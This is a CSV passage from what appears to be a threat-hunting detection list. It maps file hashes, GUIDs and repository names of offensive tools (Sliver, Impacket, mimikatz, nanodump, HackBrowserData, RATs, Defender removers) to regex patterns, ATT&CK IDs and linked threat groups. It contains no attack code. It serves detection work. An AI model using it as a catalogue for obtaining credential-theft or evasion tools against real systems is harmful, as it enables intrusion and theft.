"*f1c6a2f008eb7888b5b081a834088a4a1b6fd688db3c99c89541d673489ae130*",".{0,1000}f1c6a2f008eb7888b5b081a834088a4a1b6fd688db3c99c89541d673489ae130.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","43795"
"*f1ddf8432a3f2db1ab2b679abaeaccd61fc601cf2e45cf0f95d169759bc6eaf2*",".{0,1000}f1ddf8432a3f2db1ab2b679abaeaccd61fc601cf2e45cf0f95d169759bc6eaf2.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","43797"
"*F1DF1D0F-FF86-4106-97A8-F95AAF525C54*",".{0,1000}F1DF1D0F\-FF86\-4106\-97A8\-F95AAF525C54.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","#GUIDproject","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","43798"
"*f1e7f37e2e04dc87b374beae26496df2fa80cbce527ae6276c387b82e725d021*",".{0,1000}f1e7f37e2e04dc87b374beae26496df2fa80cbce527ae6276c387b82e725d021.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43799"
"*F1E836C1-2279-49B3-84CC-ED8B048FCC44*",".{0,1000}F1E836C1\-2279\-49B3\-84CC\-ED8B048FCC44.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","#GUIDproject","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","43800"
"*f1fc15082123a79f5350a6bf7897f4ac9c7474619f96efc556754918f3926ae7*",".{0,1000}f1fc15082123a79f5350a6bf7897f4ac9c7474619f96efc556754918f3926ae7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43802"
"*f1zm0/acheron*",".{0,1000}f1zm0\/acheron.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","43805"
"*f1zm0/hades*",".{0,1000}f1zm0\/hades.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","1","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","43806"
"*f20052cf692339ff89a490dd7d9f83f5b77be532d5f127f6ed186cf387622ed5*",".{0,1000}f20052cf692339ff89a490dd7d9f83f5b77be532d5f127f6ed186cf387622ed5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43807"
"*f205814e44353d23a5cef0e3cbfb37cc8ec4bfad9def53384d671dcc043c00ee*",".{0,1000}f205814e44353d23a5cef0e3cbfb37cc8ec4bfad9def53384d671dcc043c00ee.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","43808"
"*f20a1b4cdc2caf7baa975c8be3343063b5c819bda30807ffec6cddf822842c6a*",".{0,1000}f20a1b4cdc2caf7baa975c8be3343063b5c819bda30807ffec6cddf822842c6a.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","43809"
"*f213e2033269abce384e1f85c7ab9730d3527f6b1258322e8d3ad17e4e1f6498*",".{0,1000}f213e2033269abce384e1f85c7ab9730d3527f6b1258322e8d3ad17e4e1f6498.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","43810"
"*f2179c77b91b691efbf523410bdd70aa97c9a6866d5d13004a8ff559243f18e0*",".{0,1000}f2179c77b91b691efbf523410bdd70aa97c9a6866d5d13004a8ff559243f18e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43812"
"*f22360bb210b78e92b7aecfefb3c0c70e72e81cd03c1afd616e7691a744c3b28*",".{0,1000}f22360bb210b78e92b7aecfefb3c0c70e72e81cd03c1afd616e7691a744c3b28.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","43813"
"*f22c8a9bf9bba73a4b5ad20ba6666c8da8b1d77eaf670448b25792336de7f512*",".{0,1000}f22c8a9bf9bba73a4b5ad20ba6666c8da8b1d77eaf670448b25792336de7f512.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","43814"
"*F233D36D-B64A-4F14-A9F9-B8557C2D4F5D*",".{0,1000}F233D36D\-B64A\-4F14\-A9F9\-B8557C2D4F5D.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","43815"
"*f236aee384d7a0fab7fc186454ee6adb83b756843ecf75ec14b3df826a66ff1d*",".{0,1000}f236aee384d7a0fab7fc186454ee6adb83b756843ecf75ec14b3df826a66ff1d.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","43816"
"*F2378C48-D441-49E7-B094-1E8642A7E7C0*",".{0,1000}F2378C48\-D441\-49E7\-B094\-1E8642A7E7C0.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","43817"
"*f23950926273d8ee262e32edf0325618322cc22a9fbaf300d5692e48c5fdd18c*",".{0,1000}f23950926273d8ee262e32edf0325618322cc22a9fbaf300d5692e48c5fdd18c.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","43818"
"*f23ac192b0a075ff7d7f26185c99b21cfb1b46ec211e67cdae626d200476f3b7*",".{0,1000}f23ac192b0a075ff7d7f26185c99b21cfb1b46ec211e67cdae626d200476f3b7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43819"
"*f2514c44ea0566d15601e6179fab45dbb023b78cb0903a28196a31599f17be00*",".{0,1000}f2514c44ea0566d15601e6179fab45dbb023b78cb0903a28196a31599f17be00.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059 - T1070.004","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","#filehash","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","43821"
"*f253b430b9d2dafe0e67a9974e7a806f21c6589c02aed1cdc595d23fe619f492*",".{0,1000}f253b430b9d2dafe0e67a9974e7a806f21c6589c02aed1cdc595d23fe619f492.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","43822"
"*f25631f72f20a2ce8a443207938a6cffb63d0b48bab281a80dc64a0d315680bf*",".{0,1000}f25631f72f20a2ce8a443207938a6cffb63d0b48bab281a80dc64a0d315680bf.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43823"
"*f2691b74-129f-4ac2-a88a-db4b0f36b609*",".{0,1000}f2691b74\-129f\-4ac2\-a88a\-db4b0f36b609.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","#GUIDproject","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","43825"
"*f26f806ab5bce710cc598cc1623c2094e06b36548240c5db136d7e6d32ccbae5*",".{0,1000}f26f806ab5bce710cc598cc1623c2094e06b36548240c5db136d7e6d32ccbae5.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#filehash","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","43826"
"*f273248a26cf21cef5c0f1288f90b5aef915b477c81eb62949ab4e519b4b604b*",".{0,1000}f273248a26cf21cef5c0f1288f90b5aef915b477c81eb62949ab4e519b4b604b.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","43827"
"*f27479a8728d9126cc055daeb5cddd01cabfa37d*",".{0,1000}f27479a8728d9126cc055daeb5cddd01cabfa37d.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","43828"
"*f2754719c9b797be118057367989dc2da30a55d3f17260b55d252efdf7967579*",".{0,1000}f2754719c9b797be118057367989dc2da30a55d3f17260b55d252efdf7967579.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43829"
"*f2816b74ccb015b5eb7910f0ee389531ffaa0df8bc613d419cc4d4a50e99bb4e*",".{0,1000}f2816b74ccb015b5eb7910f0ee389531ffaa0df8bc613d419cc4d4a50e99bb4e.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","43831"
"*f283690950663e8831078bd3f7d02835047997f65445f90a364626fb835809c4*",".{0,1000}f283690950663e8831078bd3f7d02835047997f65445f90a364626fb835809c4.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","#filehash","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","43832"
"*f285e0f2aa29132c803b6f135bcabd7b93c0f91d7340735f8c60ae90ad4f3f8e*",".{0,1000}f285e0f2aa29132c803b6f135bcabd7b93c0f91d7340735f8c60ae90ad4f3f8e.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","43833"
"*f2894f6ee03703bbd4a7940eb5a29d1521beee7c44d4e2fc095b65b667697365*",".{0,1000}f2894f6ee03703bbd4a7940eb5a29d1521beee7c44d4e2fc095b65b667697365.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","43834"
"*f28955ff3d7997fbac71b4fe7c92a8b537566ace240455a312383792745c3e18*",".{0,1000}f28955ff3d7997fbac71b4fe7c92a8b537566ace240455a312383792745c3e18.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","43835"
"*f28f1fbb388f56f6fda84498734d2de8487c851b6fac9866bbf27dc3852d3e41*",".{0,1000}f28f1fbb388f56f6fda84498734d2de8487c851b6fac9866bbf27dc3852d3e41.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43836"
"*f2935c9643fbbf76da73f5218cf6a8b299b4252247d81060f8d7d12f146bd69d*",".{0,1000}f2935c9643fbbf76da73f5218cf6a8b299b4252247d81060f8d7d12f146bd69d.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","43838"
"*f2a64b4fce0d07eafded5c2125d7d80b*",".{0,1000}f2a64b4fce0d07eafded5c2125d7d80b.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","43839"
"*F2BA8C8961B3624BDB06DA8025CE8BB39B0375CA78CB4E52FE0259613FE6CEBD*",".{0,1000}F2BA8C8961B3624BDB06DA8025CE8BB39B0375CA78CB4E52FE0259613FE6CEBD.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","43841"
"*f2c1234d05744b49749b6ef743d7a71a45d96400ec1b510531032de8312a377d*",".{0,1000}f2c1234d05744b49749b6ef743d7a71a45d96400ec1b510531032de8312a377d.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","#filehash","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","43842"
"*f2c6184aaf6255cbac03af0f218b99f1937a892ed268c18d718546b34f2121c3*",".{0,1000}f2c6184aaf6255cbac03af0f218b99f1937a892ed268c18d718546b34f2121c3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43843"
"*f2c7d2d0539d1549c8f1a9a461b467d6ef0d4eb40c3ab8ba5412398d65a6f398*",".{0,1000}f2c7d2d0539d1549c8f1a9a461b467d6ef0d4eb40c3ab8ba5412398d65a6f398.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","43844"
"*f2c7d2d0539d1549c8f1a9a461b467d6ef0d4eb40c3ab8ba5412398d65a6f398*",".{0,1000}f2c7d2d0539d1549c8f1a9a461b467d6ef0d4eb40c3ab8ba5412398d65a6f398.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","43845"
"*f2ca48973b72ab97f4cb482062d2ab8778078107767a36062e11243a3265e756*",".{0,1000}f2ca48973b72ab97f4cb482062d2ab8778078107767a36062e11243a3265e756.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","43847"
"*F2D38A31-CF17-4962-A601-6779F18FDBF2*",".{0,1000}F2D38A31\-CF17\-4962\-A601\-6779F18FDBF2.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","43848"
"*f2d54156ad1c855eb44c874588913ed640a119b5e9399851ccbc424bd1e3ac25*",".{0,1000}f2d54156ad1c855eb44c874588913ed640a119b5e9399851ccbc424bd1e3ac25.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","43849"
"*f2d93a4d4188a53285c334699b010750786a607162a498f2ff2a93d823cbf0fc*",".{0,1000}f2d93a4d4188a53285c334699b010750786a607162a498f2ff2a93d823cbf0fc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","43850"
